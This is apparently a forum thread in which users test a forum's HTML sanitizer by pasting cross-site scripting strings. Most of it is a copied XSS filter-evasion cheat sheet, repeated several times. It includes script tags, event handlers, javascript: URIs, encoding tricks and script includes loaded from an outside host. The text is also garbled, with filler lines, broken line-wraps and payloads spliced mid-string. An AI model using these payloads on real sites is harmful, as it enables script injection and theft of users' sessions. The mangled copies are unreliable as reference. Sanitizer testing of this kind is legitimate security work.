JellyPotato (Warning, Should probably stay out.)



  • redacted - bz



  • @Matches


    redacted -bz

    Jelly



  • Now for some paging



  • Now for some paging



  • Now for some paging



  • redacted - bz



  • redacted - bz



  • redacted - bz




  • F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    [omitted]



  • Dance for me <script>alert('Maybe')</script><scri%20pt>alert('idk')</script%>>




  • XSS

    <
    %3C
    &lt
    <
    &LT
    <
    &#60
    &#060
    &#0060
    &#00060
    &#000060
    &#0000060
    <
    <
    <
    <
    <
    <
    &#x3c
    &#x03c
    &#x003c
    &#x0003c
    &#x00003c
    &#x000003c
    <
    <
    <
    <
    <
    &#x000003c;
    &#X3c
    &#X03c
    &#X003c
    &#X0003c
    &#X00003c
    &#X000003c
    <
    <
    <
    <
    <
    &#X000003c;
    &#x3C
    &#x03C
    &#x003C
    &#x0003C
    &#x00003C
    &#x000003C
    <
    <
    <
    <
    <
    &#x000003C;
    &#X3C
    &#X03C
    &#X003C
    &#X0003C
    &#X00003C
    &#X000003C
    <
    <
    <
    <
    <
    &#X000003C;
    \x3c
    \x3C
    \u003c
    \u003C



  • <form action="" method="GET"> <input id="query" name="query" value="Enter query here..." onfocus="this.value=''"> <input id="button" type="submit" value="Search"> </form>


  • <img src=x onerror="

    Hum @Matches"/>

    <img src=x onerror="

    .jpg' />

    <script>alert('testing')</script>

    <body> Hello {{ USERNAME }}, view your Account. <script> var id = {{ USER_ID }}; alert("Your user ID is: " + id); </script> </body>


  • ';alert(String.fromCharCode( »
    88,83,83))//';alert(String. »
    fromCharCode(88,83,83))//";a »
    lert(String.fromCharCode(88, »
    83,83))//";alert(String.fro »
    mCharCode(88,83,83))//--></S »
    CRIPT>">'><SCRIPT>alert(Stri »
    ng.fromCharCode(88,83,83))</ »
    SCRIPT>=&{}



  • =&{()}

    <BGSOUND »
    SRC="javascript:alert('XSS') »
    ;">

    <BASE » HREF="javascript:alert('XSS' » );//">


  • Locator
    ';alert(String.fromCharCode( »
    88,83,83))//';alert(String. »
    fromCharCode(88,83,83))//";a »
    lert(String.fromCharCode(88, »
    83,83))//";alert(String.fro »
    mCharCode(88,83,83))//--></S »
    CRIPT>">'><SCRIPT>alert(Stri »
    ng.fromCharCode(88,83,83))</ »
    SCRIPT>=&{}
    ';alert(String.fromCharCode( »
    88,83,83))//';alert(String. »
    fromCharCode(88,83,83))//";a »
    lert(String.fromCharCode(88, »
    83,83))//";alert(String.fro »
    mCharCode(88,83,83))//--> »
    ">'>=&{}
    ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>=&{}
    XSS Quick Test
    '';!--"<xss>=&{()}<br/> '';!--"=&{()}<br/> '';!--"=&{()}<br/> SCRIPT w/Alert()</xss>

    <script>alert('XSS')</SCRIPT » > SCRIPT w/Source File <SCRIPT » SRC=http://ha.ckers.org/xss. » js></SCRIPT> <p dir="auto">SCRIPT w/Char Code</p> <SCRIPT>alert(String.fromCha » rCode(88,83,83))</SCRIPT> <p dir="auto">BASE</p> <BASE » HREF="javascript:alert('XSS' » );//"> BGSOUND <BGSOUND » SRC="javascript:alert('XSS') » ;"> BODY background-image <BODY » BACKGROUND="javascript:alert » ('XSS');"> BODY ONLOAD <BODY ONLOAD=alert('XSS')> DIV background-image 1 <DIV » STYLE="background-image: » url(javascript:alert('XSS')) » "> <div></div> DIV background-image 2 <DIV » STYLE="background-image: » url(javascript:alert('XS » S'))"> <div></div> DIV expression <DIV STYLE="width: » expression(alert('XSS'));"> <div></div> FRAME <FRAMESET><FRAME » SRC="javascript:alert('XSS') » ;"></FRAMESET> IFRAME <IFRAME » SRC="javascript:alert('XSS') » ;"></IFRAME> INPUT Image <INPUT TYPE="IMAGE" » SRC="javascript:alert('XSS') » ;"> IMG w/JavaScript Directive <IMG » SRC="javascript:alert('XSS') » ;"> IMG No Quotes/Semicolon <IMG » SRC=javascript:alert('XSS')> IMG Dynsrc <IMG » DYNSRC="javascript:alert('XS » S');"> IMG Lowsrc <IMG » LOWSRC="javascript:alert('XS » S');"> IMG Embedded commands 1 <IMG » SRC="http://www.thesiteyouar » eon.com/somecommand.php?some » variables=maliciouscode"> <img » src="http://www.thesiteyouar » eon.com/somecommand.php?some » variables=maliciouscode" » alt="somecommand.php?somevar » iables=maliciousc" /> somecommand.php?somevariables=maliciousc IMG STYLE w/expression exp/*<XSS » STYLE='no\xss:noxss("*//*"); » <p dir="auto">xss:ex/<em>XSS</em>//<em>/</em> »<br /> /pression(alert(&quot;XSS&quot;))'&gt;<br /> exp/*<br /> exp/*<br /> List-style-image</p> <STYLE>li {list-style-image: » url("javascript:alert('XSS') » ");}</STYLE><UL><LI>XSS <ul><li>XSS</li></ul> XSS IMG w/VBscript <IMG » SRC='vbscript:msgbox("XSS")' » > LAYER <LAYER » SRC="http://ha.ckers.org/scr » iptlet.html"></LAYER> Livescript <IMG » SRC="livescript:[code]"> US-ASCII encoding 
scriptalert(XSS)/script » scriptalert(XSS)/script scriptalert(XSS)/script META <META HTTP-EQUIV="refresh" » CONTENT="0;url=javascript:al » ert('XSS');"> META w/data:URL <META HTTP-EQUIV="refresh" » CONTENT="0;url=data:text/htm » l;base64,PHNjcmlwdD5hbGVydCg » nWFNTJyk8L3NjcmlwdD4K"> META w/additional URL parameter <META HTTP-EQUIV="refresh" » CONTENT="0; » URL=http://;URL=javascript:a » lert('XSS');"> Mocha <IMG SRC="mocha:[code]"> OBJECT <OBJECT » TYPE="text/x-scriptlet" » DATA="http://ha.ckers.org/sc » riptlet.html"></OBJECT> OBJECT w/Embedded XSS <OBJECT » classid=clsid:ae24fdae-03c6- » 11d1-8b76-0080c744f389><para » m name=url » value=javascript:alert('XSS' » )></OBJECT> Embed Flash <EMBED » SRC="http://ha.ckers.org/xss » .swf" » AllowScriptAccess="always">< » /EMBED> STYLE <STYLE » TYPE="text/javascript">alert » ('XSS');</STYLE> STYLE w/Comment <IMG » STYLE="xss:expr/*XSS*/ession » (alert('XSS'))"> STYLE w/Anonymous HTML <XSS » STYLE="xss:expression(alert( » 'XSS'))"> STYLE w/background-image <STYLE>.XSS{background-image » :url("javascript:alert('XSS' » )");}</STYLE><A » CLASS=XSS></A> <a class="XSS"></a> STYLE w/background <STYLE » type="text/css">BODY{backgro » und:url("javascript:alert('X » SS')")}</STYLE> Stylesheet <LINK REL="stylesheet" » HREF="javascript:alert('XSS' » );"> Remote Stylesheet 1 <LINK REL="stylesheet" » HREF="http://ha.ckers.org/xs » s.css"> Remote Stylesheet 2 <STYLE>@import'http://ha.cke » rs.org/xss.css';</STYLE> Remote Stylesheet 3 <META HTTP-EQUIV="Link" » Content="<http://ha.ckers.or » g/xss.css>; REL=stylesheet"> Remote Stylesheet 4 <STYLE>BODY{-moz-binding:url » ("http://ha.ckers.org/xssmoz » .xml#xss")}</STYLE> TABLE <TABLE » BACKGROUND="javascript:alert » ('XSS')"></TABLE> TD <TABLE><TD » BACKGROUND="javascript:alert » ('XSS')"></TD></TABLE> XML namespace <HTML xmlns:xss> <?import » namespace="xss" » implementation="http://ha.ck » ers.org/xss.htc"> <xss:xss>X » SS</xss:xss> </HTML> <?import namespace="xss" » 
implementation="http://ha.ck » ers.org/xss.htc"> XSS <?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> XSS XML data island w/CDATA <XML » ID=I><X><C><![CDATA[<IMG » SRC="javas]]><![CDATA[cript: » alert('XSS');">]]> <p dir="auto"></C></X> »<br /> </xml><SPAN DATASRC=#I »<br /> DATAFLD=C DATAFORMATAS=HTML><br /> <IMG »<br /> SRC="javascript:alert('XSS') »<br /> ;"></p> <p dir="auto"><span></span><br /> <IMG SRC="javascript:alert('XSS');"><br /> XML data island w/comment <br /> <XML ID="xss"><I><B><IMG »<br /> SRC="javas<!--​ » -->cript:alert('XSS')"></B>< »<br /> /I></XML></p> <p dir="auto"><SPAN »<br /> DATASRC="#xss" DATAFLD="B" »<br /> DATAFORMATAS="HTML"></SPAN><br /> <i><b><img src="javas" »<br /> alt="javas<!-- »<br /> -->cript:alert('XSS')" »<br /> /></b></i><span></span><br /> javas<!--​ -->cript:alert('XSS')<br /> XML (locally hosted) <br /> <XML »<br /> SRC="<a href="http://ha.ckers.org/xss" rel="nofollow">http://ha.ckers.org/xss</a> »<br /> test.xml" ID=I></XML><br /> <SPAN »<br /> DATASRC=#I DATAFLD=C »<br /> DATAFORMATAS=HTML></SPAN><br /> <span></span><br /> XML HTML+TIME</p> <HTML><BODY> <?xml:namespace » prefix="t" » ns="urn:schemas-microsoft-co » m:time"> <?import » namespace="t" » implementation="#default#tim » e2"> <t:set » attributeName="innerHTML" » to="XSS<SCRIPT » DEFER>alert('XSS')</SCRIPT>" » > </BODY></HTML> <?xml:namespace » prefix="t" » ns="urn:schemas-microsoft-co » m:time"> <?import » namespace="t" » implementation="#default#tim » e2"> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> Commented-out Block <!--​[if gte IE » 4]> <SCRIPT>alert('XSS');</S » CRIPT> <![endif]--> Cookie Manipulation <META » HTTP-EQUIV="Set-Cookie" » Content="USERID=<SCRIPT>aler » t('XSS')</SCRIPT>"> Local .htc file <XSS STYLE="behavior: » url(http://ha.ckers.org/xss. 
» htc);"> Rename .js to .jpg <SCRIPT » SRC="http://ha.ckers.org/xss » .jpg"></SCRIPT> SSI <!--​#exec cmd="/bin/echo » '<SCRIPT SRC'"--><!--​#exec » cmd="/bin/echo » '=http://ha.ckers.org/xss.js » ></script>'"--> PHP <? » echo('<SCR)'; echo('IPT>aler » t("XSS")</SCRIPT>'); ?>

    <? echo('alert("XSS")'); »
    ?>

    <? echo('alert("XSS")'); ?>

    JavaScript Includes



    Character Encoding Example
    <
    %3C
    &lt
    <
    &LT
    <
    &#60 »

    &#060
    &#0060

    &#00060
    &#000 »
    060
    &#0000060
    <
    <
    & »
    #0060;
    <
    <
    &# »
    0000060;
    &#x3c
    &#x03c
    &#x003 »
    c
    &#x0003c
    &#x00003c
    &#x0000 »
    03c
    <
    <

    < »

    <
    <
    &#x000 »
    003c;
    &#X3c
    &#X03c
    &#X003c
    & »
    #X0003c
    &#X00003c
    &#X000003c »

    <
    <
    <
    &#X »
    0003c;
    <
    &#X000003c »
    ;
    &#x3C

    &#x03C
    &#x003C
    &#x0 »
    003C
    &#x00003C
    &#x000003C
    &# »
    x3C;
    <
    <
    &#x000 »
    3C;
    <
    &#x000003C;
    & »
    #X3C
    &#X03C
    &#X003C
    &#X0003C »

    &#X00003C
    &#X000003C

    &#X3C »
    ;
    <
    <
    < »

    <
    &#X000003C;
    \x3c »

    \x3C
    \u003c
    \u003C
    <
    %3C
    &lt
    <
    &L »
    T
    &LT;
    <
    <
    <

    & »
    lt;
    <
    <
    <
    <
    < »

    <
    <
    <
    <
    <
    &l »
    t;
    <
    <
    <
    <
    <
    »

    <
    <
    <
    <
    <
    &l »
    t;
    <
    <
    <
    <
    <
    »
    <
    <
    <
    <
    <
    &lt »
    ;

    <
    <
    <
    <
    <
    »
    <
    <
    <
    <
    <
    &lt »
    ;
    <
    <
    <
    <
    <
    & »
    lt;

    <
    <
    <
    <
    &lt »
    ;
    <
    \x3c
    \x3C
    \u003c
    \u00 »
    3C
    < %3C &lt < &LT < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C
    Case Insensitive
    <IMG »
    SRC=JaVaScRiPt:alert('XSS')>
    HTML Entities
    <IMG »
    SRC=javascript:alert("X »
    SS")>
    Grave Accents
    <IMG »
    SRC=javascript:alert("RSnak » e says, 'XSS'")>
    <img »
    src="%60javascript%3Aalert(" »
    alt="javascript:alert(&quot » ;RSnake" /> javascript:alert("RSnake
    Image w/CharCode
    <IMG »
    SRC=javascript:alert(String. »
    fromCharCode(88,83,83))>
    UTF-8 Unicode Encoding
    <IMG »
    SRC=java&# »
    115;crip& »
    #116;:ale& »
    #114;t('X&# »
    83;S')>
    Long UTF-8 Unicode w/out Semicolons
    <IMG »
    SRC=&#0000106&#0000097&#0000 »
    118&#0000097&#0000115&#00000 »
    99&#0000114&#0000105&#000011 »
    2&#0000116&#0000058&#0000097 »
    &#0000108&#0000101&#0000114& »
    #0000116&#0000040&#0000039&# »
    0000088&#0000083&#0000083&#0 »
    000039&#0000041>
    DIV w/Unicode

    Hex Encoding w/out Semicolons UTF-7 Encoding <HEAD><META » HTTP-EQUIV="CONTENT-TYPE" » CONTENT="text/html; » charset=UTF-7"> » </HEAD>+ADw-SCRIPT+AD4-alert » ('XSS');+ADw-/SCRIPT+AD4- +ADw-SCRIPT+AD4-alert('XSS') » ;+ADw-/SCRIPT+AD4- +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- Escaping JavaScript escapes \";alert('XSS');// \";alert('XSS');// \";alert('XSS');// End title tag </TITLE><SCRIPT>alert("XSS") » ;</SCRIPT> STYLE w/broken up JavaScript <STYLE>@im\port'\ja\vasc\rip » t:alert("XSS")';</STYLE> Embedded Tab jav »
ascript:alert('XSS'); jav ascript:alert('XSS'); Embedded Encoded Tab jav »
ascript:alert('XSS'); jav ascript:alert('XSS'); Embedded Newline jav »
ascript:alert('XSS'); jav ascript:alert('XSS'); Embedded Carriage Return jav »
ascript:alert('XSS'); jav ascript:alert('XSS'); Multiline w/Carriage Returns p
    t
    :
    a
    l
    e
    r
    t
    (
    '
    X
    S
    S
    ' »

    )
    "

    <img »
    src="j%20a%20v%20a%20s%20c%2 »
    0r%20i%20p%20t%20%3A%20a%20l »
    %20e%20r%20t%20(%20'%20X%20S »
    %20S%20'%20)" alt="j a v a s »
    c r i p t : a l e r t ( ' X »
    S" />
    j a v a s c r i p t : a l e r t ( ' X S
    Null Chars 1
    <IMG »
    SRC=java\0script:alert("XSS") »

    Null Chars 2
    &<SCR\0IPT>alert("XSS")</SCR\0 »
    IPT>
    &
    &
    Spaces/Meta Chars

    Non-Alpha/Non-Digit
    <SCRIPT/XSS »
    SRC="http://ha.ckers.org/xss »
    .js"></SCRIPT>
    Non-Alpha/Non-Digit Part 2

    <BODY » onload!#$%&()*~+-_.,:;?@[/|\ » ]^`=alert("XSS")> No Closing Script Tag <SCRIPT » SRC=http://ha.ckers.org/xss. » js Protocol resolution in script tags <SCRIPT » SRC=//ha.ckers.org/.j> Half-Open HTML/JavaScript alert("XSS");//< < < Malformed IMG Tags <script>alert("XSS")</SC » RIPT>"> "> "> No Quotes/Semicolons <SCRIPT>a=/XSS/ alert(a.sour » ce)</SCRIPT> Evade Regex Filter 1 <SCRIPT a=">" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 2 <SCRIPT ="blah" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 3 <SCRIPT a="blah" '' » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 4 <SCRIPT "a='>'" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 5 <SCRIPT a=`>` » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Filter Evasion 1 <SCRIPT>document.write("<SCR » I");</SCRIPT>PT » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> PT » SRC="http://ha.ckers.org/xss » .js"> PT SRC="http://ha.ckers.org/xss.js"> Filter Evasion 2 <SCRIPT a=">'>" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> IP Encoding <A » HREF="http://66.102.7.147/"> » XSS</A> <a » href="http://66.102.7.147/"> » XSS</a> XSS URL Encoding <A » HREF="http://%77%77%77%2E%67 » %6F%6F%67%6C%65%2E%63%6F%6D" » >XSS</A> <a>XSS</a> XSS Dword Encoding <A » HREF="http://1113982867/">XS » S</A> <a href="/">XSS</a> XSS Hex Encoding <A » HREF="http://0x42.0x0000066. » 0x7.0x93/">XSS</A> <a href="/">XSS</a> XSS Octal Encoding <A » HREF="http://0102.0146.0007. 
» 00000223/">XSS</A> <a href="/">XSS</a> XSS Mixed Encoding <A » HREF="h tt\tp://6 6.00014 » 6.0x7.147/">XSS</A> <a » href="h%20tt%20p%3A//6%206.0 » 00146.0x7.147/">XSS</a> XSS Protocol Resolution Bypass <A » HREF="//www.google.com/">XSS » </A> <a>XSS</a> XSS Firefox Lookups 1 <A HREF="//google">XSS</A> <a href="//google">XSS</a> XSS Firefox Lookups 2 <A » HREF="http://ha.ckers.org@go » ogle">XSS</A> <a » href="http://google">XSS</a> XSS Firefox Lookups 3 <A » HREF="http://google:ha.ckers » .org">XSS</A> <a » href="http://google">XSS</a> XSS Removing Cnames <A » HREF="http://google.com/">XS » S</A> <a>XSS</a> XSS Extra dot for Absolute DNS <A » HREF="http://www.google.com. » /">XSS</A> <a>XSS</a> XSS JavaScript Link Location <A » HREF="javascript:document.lo » cation='http://www.google.co » m/'">XSS</A> <a>XSS</a> XSS Content Replace <A » HREF="http://www.gohttp://ww » w.google.com/ogle.com/">XSS< » /A> <a » href="http://www.gohttp//www » .google.com/ogle.com/">XSS</ » a> XSS</script>


  • Just so you know, the source code for the HTML sanitizer is here (the link was not preserved in this copy of the thread):



  • <IMG »
    SRC="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode">

    <img »
    src="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode" »
    alt="somecommand.php?somevar »
    iables=maliciousc" />

    IMG Lowsrc
    <IMG »
    LOWSRC="javascript:alert('XS »
    S');">
    IMG Embedded commands 1
    <IMG »
    SRC="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode">
    <img »
    src="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode" »
    alt="somecommand.php?somevar »
    iables=maliciousc" />



  • What's the fun in that?
    @ben_lubar Something broke in the big block from http://htmlpurifier.org/live/smoketests/xssAttacks.php - trying to figure out which combination caused it.



  • IMG Dynsrc
    <IMG »
    DYNSRC="javascript:alert('XS »
    S');">
    IMG Lowsrc
    <IMG »
    LOWSRC="javascript:alert('XS »
    S');">
    IMG Embedded commands 1
    <IMG »
    SRC="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode">
    <img »
    src="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode" »
    alt="somecommand.php?somevar »
    iables=maliciousc" />
    somecommand.php?somevariables=maliciousc





  • IMG Embedded commands 1
    <IMG »
    SRC="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode">
    <img »
    src="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode" »
    alt="somecommand.php?somevar »
    iables=maliciousc" />
    somecommand.php?somevariables=maliciousc
    IMG STYLE w/expression
    exp/<XSS »
    STYLE='no\xss:noxss("
    //*"); »

    xss:ex/XSS/// »
    /pression(alert("XSS"))'>
    exp/*
    exp/*
    List-style-image

    <STYLE>li {list-style-image: » url("javascript:alert('XSS') » ");}</STYLE>
    • XSS
      • XSS
      XSS IMG w/VBscript LAYER <LAYER » SRC="http://ha.ckers.org/scr » iptlet.html"></LAYER> Livescript US-ASCII encoding scriptalert(XSS)/script » scriptalert(XSS)/script scriptalert(XSS)/script META <META HTTP-EQUIV="refresh" » CONTENT="0;url=javascript:al » ert('XSS');"> META w/data:URL <META HTTP-EQUIV="refresh" » CONTENT="0;url=data:text/htm » l;base64,PHNjcmlwdD5hbGVydCg » nWFNTJyk8L3NjcmlwdD4K"> META w/additional URL parameter <META HTTP-EQUIV="refresh" » CONTENT="0; » URL=http://;URL=javascript:a » lert('XSS');"> Mocha OBJECT <OBJECT » TYPE="text/x-scriptlet" » DATA="http://ha.ckers.org/sc » riptlet.html"></OBJECT> OBJECT w/Embedded XSS <OBJECT » classid=clsid:ae24fdae-03c6- » 11d1-8b76-0080c744f389><para » m name=url » value=javascript:alert('XSS' » )></OBJECT> Embed Flash <EMBED » SRC="http://ha.ckers.org/xss » .swf" » AllowScriptAccess="always">< » /EMBED> STYLE <STYLE » TYPE="text/javascript">alert » ('XSS');</STYLE> STYLE w/Comment STYLE w/Anonymous HTML <XSS » STYLE="xss:expression(alert( » 'XSS'))"> STYLE w/background-image <STYLE>.XSS{background-image » :url("javascript:alert('XSS' » )");}</STYLE> STYLE w/background <STYLE » type="text/css">BODY{backgro » und:url("javascript:alert('X » SS')")}</STYLE> Stylesheet <LINK REL="stylesheet" » HREF="javascript:alert('XSS' » );"> Remote Stylesheet 1 <LINK REL="stylesheet" » HREF="http://ha.ckers.org/xs » s.css"> Remote Stylesheet 2 <STYLE>@import'http://ha.cke » rs.org/xss.css';</STYLE> Remote Stylesheet 3 <META HTTP-EQUIV="Link" » Content="<http://ha.ckers.or » g/xss.css>; REL=stylesheet"> Remote Stylesheet 4 <STYLE>BODY{-moz-binding:url » ("http://ha.ckers.org/xssmoz » .xml#xss")}</STYLE> TABLE
      TD
      XML namespace <HTML xmlns:xss> <?import » namespace="xss" » implementation="http://ha.ck » ers.org/xss.htc"> <xss:xss>X » SS</xss:xss> </HTML> <?import namespace="xss" » implementation="http://ha.ck » ers.org/xss.htc"> XSS <?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> XSS XML data island w/CDATA <XML » ID=I><X><C><![CDATA[<IMG » SRC="javas]]><![CDATA[cript: » alert('XSS');">]]>

      </C></X> »
      </xml><SPAN DATASRC=#I »
      DATAFLD=C DATAFORMATAS=HTML>
      <IMG »
      SRC="javascript:alert('XSS') »
      ;">



      XML data island w/comment
      <XML ID="xss"><IMG »
      SRC="javascript:alert('XSS')">
      < »
      /I></XML>

      <SPAN »
      DATASRC="#xss" DATAFLD="B" »
      DATAFORMATAS="HTML">
      <img src="javas" »
      alt="javas<!-- »
      -->cript:alert('XSS')" »
      />

      javascript:alert('XSS')
      XML (locally hosted)
      <XML »
      SRC="http://ha.ckers.org/xss »
      test.xml" ID=I></XML>
      <SPAN »
      DATASRC=#I DATAFLD=C »
      DATAFORMATAS=HTML>

      XML HTML+TIME

      <HTML><BODY> <?xml:namespace » prefix="t" » ns="urn:schemas-microsoft-co » m:time"> <?import » namespace="t" » implementation="#default#tim » e2"> <t:set » attributeName="innerHTML" » to="XSS<SCRIPT » DEFER>alert('XSS')</SCRIPT>" » > </BODY></HTML> <?xml:namespace » prefix="t" » ns="urn:schemas-microsoft-co » m:time"> <?import » namespace="t" » implementation="#default#tim » e2"> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> Commented-out Block Cookie Manipulation <META » HTTP-EQUIV="Set-Cookie" » Content="USERID=<SCRIPT>aler » t('XSS')</SCRIPT>"> Local .htc file <XSS STYLE="behavior: » url(http://ha.ckers.org/xss. » htc);"> Rename .js to .jpg <SCRIPT » SRC="http://ha.ckers.org/xss » .jpg"></SCRIPT> SSI PHP <? » echo('<SCR)'; echo('IPT>aler » t("XSS")</SCRIPT>'); ?>

      <? echo('alert("XSS")'); »
      ?>

      <? echo('alert("XSS")'); ?>

      JavaScript Includes



      Character Encoding Example
      <
      %3C
      &lt
      <
      &LT
      <
      &#60 »

      &#060
      &#0060

      &#00060
      &#000 »
      060
      &#0000060
      <
      <
      & »
      #0060;
      <
      <
      &# »
      0000060;
      &#x3c
      &#x03c
      &#x003 »
      c
      &#x0003c
      &#x00003c
      &#x0000 »
      03c
      <
      <

      < »

      <
      <
      &#x000 »
      003c;
      &#X3c
      &#X03c
      &#X003c
      & »
      #X0003c
      &#X00003c
      &#X000003c »

      <
      <
      <
      &#X »
      0003c;
      <
      &#X000003c »
      ;
      &#x3C

      &#x03C
      &#x003C
      &#x0 »
      003C
      &#x00003C
      &#x000003C
      &# »
      x3C;
      <
      <
      &#x000 »
      3C;
      <
      &#x000003C;
      & »
      #X3C
      &#X03C
      &#X003C
      &#X0003C »

      &#X00003C
      &#X000003C

      &#X3C »
      ;
      <
      <
      < »

      <
      &#X000003C;
      \x3c »

      \x3C
      \u003c
      \u003C
      <
      %3C
      &lt
      <
      &L »
      T
      &LT;
      <
      <
      <

      & »
      lt;
      <
      <
      <
      <
      < »

      <
      <
      <
      <
      <
      &l »
      t;
      <
      <
      <
      <
      <
      »

      <
      <
      <
      <
      <
      &l »
      t;
      <
      <
      <
      <
      <
      »
      <
      <
      <
      <
      <
      &lt »
      ;

      <
      <
      <
      <
      <
      »
      <
      <
      <
      <
      <
      &lt »
      ;
      <
      <
      <
      <
      <
      & »
      lt;

      <
      <
      <
      <
      &lt »
      ;
      <
      \x3c
      \x3C
      \u003c
      \u00 »
      3C
      < %3C &lt < &LT < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C
      Case Insensitive
      <IMG »
      SRC=JaVaScRiPt:alert('XSS')>
      HTML Entities
      <IMG »
      SRC=javascript:alert("X »
      SS")>
      Grave Accents
      <IMG »
      SRC=javascript:alert("RSnak » e says, 'XSS'")>
      <img »
      src="%60javascript%3Aalert(" »
      alt="javascript:alert(&quot » ;RSnake" /> javascript:alert("RSnake
      Image w/CharCode
      <IMG »
      SRC=javascript:alert(String. »
      fromCharCode(88,83,83))>
      UTF-8 Unicode Encoding
      <IMG »
      SRC=java&# »
      115;crip& »
      #116;:ale& »
      #114;t('X&# »
      83;S')>
      Long UTF-8 Unicode w/out Semicolons
      <IMG »
      SRC=&#0000106&#0000097&#0000 »
      118&#0000097&#0000115&#00000 »
      99&#0000114&#0000105&#000011 »
      2&#0000116&#0000058&#0000097 »
      &#0000108&#0000101&#0000114& »
      #0000116&#0000040&#0000039&# »
      0000088&#0000083&#0000083&#0 »
      000039&#0000041>
      DIV w/Unicode

      Hex Encoding w/out Semicolons UTF-7 Encoding <HEAD><META » HTTP-EQUIV="CONTENT-TYPE" » CONTENT="text/html; » charset=UTF-7"> » </HEAD>+ADw-SCRIPT+AD4-alert » ('XSS');+ADw-/SCRIPT+AD4- +ADw-SCRIPT+AD4-alert('XSS') » ;+ADw-/SCRIPT+AD4- +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- Escaping JavaScript escapes \";alert('XSS');// \";alert('XSS');// \";alert('XSS');// End title tag </TITLE><SCRIPT>alert("XSS") » ;</SCRIPT> STYLE w/broken up JavaScript <STYLE>@im\port'\ja\vasc\rip » t:alert("XSS")';</STYLE> Embedded Tab jav »
ascript:alert('XSS'); jav ascript:alert('XSS'); Embedded Encoded Tab jav »
ascript:alert('XSS'); jav ascript:alert('XSS'); Embedded Newline jav »
ascript:alert('XSS'); jav ascript:alert('XSS'); Embedded Carriage Return jav »
ascript:alert('XSS'); jav ascript:alert('XSS'); Multiline w/Carriage Returns p
      t
      :
      a
      l
      e
      r
      t
      (
      '
      X
      S
      S
      ' »

      )
      "

      <img »
      src="j%20a%20v%20a%20s%20c%2 »
      0r%20i%20p%20t%20%3A%20a%20l »
      %20e%20r%20t%20(%20'%20X%20S »
      %20S%20'%20)" alt="j a v a s »
      c r i p t : a l e r t ( ' X »
      S" />
      j a v a s c r i p t : a l e r t ( ' X S
      Null Chars 1
      <IMG »
      SRC=java\0script:alert("XSS") »

      Null Chars 2
      &<SCR\0IPT>alert("XSS")</SCR\0 »
      IPT>
      &
      &
      Spaces/Meta Chars

      Non-Alpha/Non-Digit
      <SCRIPT/XSS »
      SRC="http://ha.ckers.org/xss »
      .js"></SCRIPT>
      Non-Alpha/Non-Digit Part 2

      <BODY » onload!#$%&()*~+-_.,:;?@[/|\ » ]^`=alert("XSS")> No Closing Script Tag <SCRIPT » SRC=http://ha.ckers.org/xss. » js Protocol resolution in script tags <SCRIPT » SRC=//ha.ckers.org/.j> Half-Open HTML/JavaScript alert("XSS");//< < < Malformed IMG Tags <script>alert("XSS")</SC » IMG Embedde RIPT>"> "> "> No Quotes/Semicolons <SCRIPT>a=/XSS/ alert(a.sour » ce)</SCRIPT> Evade Regex Filter 1 <SCRIPT a=">" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 2 <SCRIPT ="blah" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 3 <SCRIPT a="blah" '' » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 4 <SCRIPT "a='>'" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 5 <SCRIPT a=`>` » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Filter Evasion 1 <SCRIPT>document.write("<SCR » I");</SCRIPT>PT » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> PT » SRC="http://ha.ckers.org/xss » .js"> PT SRC="http://ha.ckers.org/xss.js"> Filter Evasion 2 <SCRIPT a=">'>" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> IP Encoding <A » HREF="http://66.102.7.147/"> » XSS</A> <a » href="http://66.102.7.147/"> » XSS</a> XSS URL Encoding <A » HREF="http://%77%77%77%2E%67 » %6F%6F%67%6C%65%2E%63%6F%6D" » >XSS</A> <a>XSS</a> XSS Dword Encoding <A » HREF="http://1113982867/">XS » 